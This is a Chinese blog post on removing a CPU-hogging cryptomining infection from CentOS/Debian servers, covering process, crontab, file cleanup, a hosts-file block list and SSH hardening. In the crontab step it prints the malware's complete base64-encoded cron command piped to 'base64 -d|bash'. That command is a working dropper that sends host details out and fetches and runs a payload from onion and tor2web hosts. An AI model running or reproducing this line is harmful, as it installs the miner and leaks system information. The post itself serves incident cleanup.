Centos/Debian 占用CPU100%挖矿病毒清理

最新推荐文章于 2024-02-26 17:21:24 发布
最新推荐文章于 2024-02-26 17:21:24 发布
阅读量1.5k 收藏
点赞数
分类专栏: 运维 文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lsy1162526799/article/details/115461899
版权

Cetnos/Debian 占用CPU100%挖矿病毒清理

①top命令查看病毒进程,现在它一般由十位数随机字符串组成
找到进程ID,例如7538,执行:

systemctl status 7538

其一般会有一个守护进程,如:
'cgroup…/system.slice/cron.service

7542 xxx

7538 xxx’

在/tmp/.X11-unix/下一般会有记录守护进程id的文件,不为空的里面好像有加密串,可以解密看看
总之:

kill -9 7542
kill -9 7538

②清理定时任务
查看定时任务:

crontab -l

定时任务中会看到一个.sh脚本,一般在’/root’下,复制.sh脚本名
打开脚本会看到base64加密的脚本命令。
例如:

 echo Wm5KaWZyUzNSaTBiaHhoMjcrc0ViQ2Q5cW03YUx5cHBDbzRRWFMwSGNqSEl4bHg3d1FtaEZWK1FLTlpaSkEzVApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJqaTU1ampwbHBrbms3ZWF5eHh0YjVvM3VseHVldm50dXRzZGFub3Y1ZHAzd3lhN2w3YnRqdjRxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash

复制echo 与|base64之间的base64串解密

然后执行命令删除脚本保存。(或者破坏脚本阻止运行等)

crontab -e

③删除脚本备份
根据解密脚本的命令中的地址,找其对脚本的备份。
除了/root外,如/etc/cron.d/ 、/opt/、/tmp/ 等。
也可以find / -name ‘脚本名’ 查找。
总之最好都删掉。
④屏蔽脚本中的域名
脚本都是被通过域名下载的。
在/etc/hosts中加入脚本中出现的域名进行屏蔽:

127.0.0.1	doh.nl.ahadns.net
127.0.0.1	dns.hostux.net
127.0.0.1	uncensored.lux1.dns.nixnet.xyz
127.0.0.1	dns.rubyfish.cn
127.0.0.1	dns.twnic.tw
127.0.0.1	doh.no.ahadns.net
127.0.0.1	doh-fi.blahdns.com
127.0.0.1	fi.doh.dns.snopyta.org
127.0.0.1	resolver-eu.lelux.fi
127.0.0.1	doh.li
127.0.0.1	dns.digitale-gesellschaft.ch
127.0.0.1	relay.tor2socks.in
127.0.0.1	tor2web.in
127.0.0.1	tor2web.it
127.0.0.1	onion.foundation
127.0.0.1	onion.com.de
127.0.0.1	onion.sh
127.0.0.1	tor2web.su

⑤后续处理
查看/root/.ssh的私钥文件有无异常,
配置/etc/ssh/sshd_config,使用密钥登录等。

如还有问题可以私信我

👉推荐!!!【腾讯云】爆款2核4G云服务器首年74元/年
👉推荐!!!【腾讯云】1核2G5M轻量应用服务器50元/年
【腾讯云】云数据库低至9.9/年!MySQL7.4元/月
【阿里云】ECS云服务器特惠
【阿里云】服务器首购优惠
如果文章对您有帮助,扫个红包码呗

红包码

EruruI
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务器cpu一直处于100%解决思路
惠惠软件
11-22 2300
网友截图咨询:cpu一直处于100%,请问是什么原因所致?突然出现的,从昨天14点左右就这样子,服务器很卡,将所有网站,web服务,mysql服务,防火墙都停止了,
MySQL服务器进程CPU占用100%的解决方法
09-11
早上帮朋友一台服务器解决了 Mysql cpu 占用 100% 的问题。稍整理了一下,将经验记录在这篇文章里。
centos kswapd0 挖矿木马病毒进程CPU100解决
1193379199的博客
01-20 1055
很多病毒都是有会在定时任务里面,以至于很难清理清楚。(由于我的服务器买油开启定时任务服务,所以里面没有任务)2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息。主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程。最好把木马程序和定时任务清理完了再杀掉,要不然还会自动重启。1.在系统里面top一下,查看了所有进程。2.排查kswapd0进程。7.杀掉kswapd0进程。4.查看进程的工作空间。
记一次CPU 100%的问题排查过程
Hi,我是sharkchili,CSDN Java领域博客专家,开源项目JavaGuide维护人员,我想写一些有意思的东西,希望对你有帮助。
03-19 2573
某些上午吃完早餐准备开始一天的工作,突然收到阿里云的短信警告,说明服务器存在恶意脚本,消息如下:当时不以为意,直到我们进行docker镜像打包时发现了不对劲,ssh始终登录不上,镜像打包也久久不能完成,大概率推断服务器出事了。登录阿里云查看CPU
记一次服务器centos7)出现奇怪进程,占用CPU的排查过程
zzm628的专栏
07-11 7478
一、现象: 通过top命令查看服务器负载,发现特别,主要原因是由于一个进程特别占用CPU资源,并且这个进程不是我们所需要的进程。此处忘记截图了 二、开始排查,怀疑是被人攻击系统,成为肉机了 1、通过lastb命令查看系统登录失败的记录,果然发现大量失败记录,并且不停的在增加,如下图: 2、然后赶紧修改了远程登录端口: vi /etc/ssh/sshd_config 修改其中的po...
CentOS处理挖矿病毒 - kthreaddi
YHJ
06-13 1669
没成功,只是记录下思路。 我的是直接重装系统镜像。。。 最近阿里云服务器一直提醒我服务器收到了病毒攻击,cpu的占有率甚至达到了100% 阿里云也给我狂发消息: 因攻击我不可能写程序攻击别人的服务器啊,一定是中病毒了!!! 1.查找病毒进程: ps -aux | sort -k3nr | head -5 或者 top 发现病毒: 原来是一个挖矿病毒,最近由于比特币的疯涨,可能带动了其他挖矿病毒的产生,这个病毒不仅能疯狂占据cpu资源而且还能通过服务器的端口攻击其他服务器,十分恶毒!
Linux VPS安全设置之一 修改SSH端口(CentOS/Debian)
09-15
我们在学会了VPS的安装和建站之后,肯定需要附带学习VPS的安全设置。因为VPS和主机不同,主机商可能会给我们备份,而且主机的安全性都有主机商承担
php-fpm 占用CPU100%的解决方法
09-15
主要介绍了php-fpm 占用CPU100%的解决方法,需要的朋友可以参考下
CentOS / Fedora / Debian / Ubuntu安装LAMP(Linux + Apache + MySQL / MariaDB / Percona Server + PHP)-PHP开发
05-27
CentOS / Debian / Ubuntu安装LAMP(Linux + Apache + MySQL / MariaDB / Percona Server + PHP)描述LAMP是一个功能强大的bash脚本,用于安装Apache + PHP + MySQL / MariaDB / Percona Server等。 您可以通过...
将安装了CentOS/RHEL 6/7的机器转变成路由器的方法
10-01
主要介绍了将安装了CentOS/RHEL 6/7的机器转变成路由器的方法,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的机器转变成路由器来用,有兴趣的可以了解一下
阿里云CentOS7 %Cpu达到100us,kthreaddi进程处理(已解决)
不爱吃鱼的猫丶的博客
05-24 2164
突然被阿里云短信轰炸,说我服务器因攻击被限制访问部分ip及端口??? 登上ECS控制台,看到CPU使用率100%???? top查看进程发现根本没有进程使用cpu。。。后来转到htop命令才可以看到kthreaddi这货,估计是被挖矿了。 htop命令,Linux系统默认不存在htop工具,可以通过如下命令进行安装。 yum install htop htop的快捷键功能列表如下,比较有用的F5、F6、F9 **功能键 ** 对应功能 说明 F1 Invoke htop Help 查看
记一次查杀centos病毒
乘茶蛙泳的博客
01-25 434
centos查杀病毒
记一次centos系统CPU占有率的处理经过
huaya1127的专栏
12-05 3534
早上到公司,发现公司群里在反馈有一个业务系统出现了问题,从昨天晚上到早上还未恢复,由于事情紧急,马上开始处理。 一、重启业务系统 本以为是业务系统可能存在bug,造成了当机了。所以首先重启了业务系统,后发现问题依旧。 而且在操作的过程中发现系统反应速度非常慢。 二、找到问题 通过top查看系统进程情况,发现有个进制cpu占用率非常。 再查看了该进制的具体内容: 发现该进程好...
linux安装杀毒软件clamav,CentOS 7 安装ClamAV杀毒软件步骤
weixin_39596835的博客
05-06 942
Clam AntiVirus(ClamAV)是免费而且开放源代码的防毒软件,软件与病毒码的更新皆由社群免费发布。目前ClamAV主要是使用在由Linux、FreeBSD等Unix-like系统架设的邮件服务器上,提供电子邮件的病毒扫描服务。安装添加epel源。yum install epel-release安装yum install clamav-server clamav-data clamav...
centos 7 journal: Suppressed xxx messages from /system.slice/xxx.service 问题的处理
最新发布
leiyanjie8995的博客
02-26 93
初看提示,似乎和Centos6 上的syslog提示有些相似之处,消息被抑制,不同的是消息来源变成了journal服务, 后面通过资料得知自rhel/centos7 后默认的syslog将逐步被systemd-journal 日志替代,在并发的nginx服务器上,每秒成千上万条很容易被默认的配置给抑制,导致日志丢失,不完整的现象,要修改限制很简单,即修改速率限制参数,完成后重启即可,命令如下。修改 /etc/rsyslog.conf。
centos中bash占用cpu,Linux中显示内存和CPU使用率最的进程和SHELL脚本例子
weixin_39640203的博客
03-18 330
显示CPU占用率最的十个进程信息# ps aux|head -1;ps aux|grep -v PID|sort -rn -k +3|headUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMANDroot 30222 5.0 3.8 10685936 38228 ? Sl Apr...
Linux CPU占用率99%很被kdevtmpfsi 和kinsing 挖矿病毒入侵
小蜜蜂
02-23 3532
目录 一:警告 二:查看cup占用 三:解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4:删除掉kdevtmpfsi的相关文件 四.怎么预防处理这个病毒 一:警告 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为...
成功处理挖矿病毒劫持,crontab注入顽固脚本,cpu、内存飙升
yan_dk的专栏
08-30 2130
本人的linux centos服务器挖矿病毒劫持有几个月了,crontab 顽固脚本一直占用,删除也删除不了,cpu、内存一直被长期占用,真是非常痛苦。最近花了几天时间研究,终于成功处理了。cpu、内存也平稳运行了,心情轻松了很多。 有需要技术支持解决问题的朋友,可以联系我。 手机:18034263356 ...
解决:/dev/mapper/centos-root 100%问题
09-06
- 使用lvextend -l 100%FREE /dev/mapper/centos-root命令将逻辑卷扩展到占用所有可用空间。 - 最后,使用xfs_growfs /dev/mapper/centos-root命令扩展文件系统容量。 2. 如果问题是由日志占用空间导致的,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值